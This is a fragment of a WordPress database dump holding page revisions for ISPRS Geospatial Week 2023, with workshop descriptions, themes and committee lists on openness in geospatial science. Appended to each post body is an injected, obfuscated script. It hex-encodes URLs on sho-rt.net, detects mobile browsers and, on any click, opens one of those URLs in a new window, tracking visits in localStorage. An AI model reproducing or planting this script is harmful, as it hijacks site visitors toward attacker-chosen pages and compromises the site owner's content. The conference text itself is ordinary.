74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2023-01-01 19:27:54','2023-01-01 19:27:54','',2876,'https://gsw2023.com/?p=3525',0,'revision','',0),
(3526,1,'2023-01-01 19:31:22','2023-01-01 19:31:22','<p>[vc_row][vc_column width=\"1/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:31:22','2023-01-01 19:31:22','',3497,'https://gsw2023.com/?p=3526',0,'revision','',0),
(3527,1,'2023-01-01 19:32:02','2023-01-01 19:32:02','<p>[vc_row][vc_column width=\"1/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 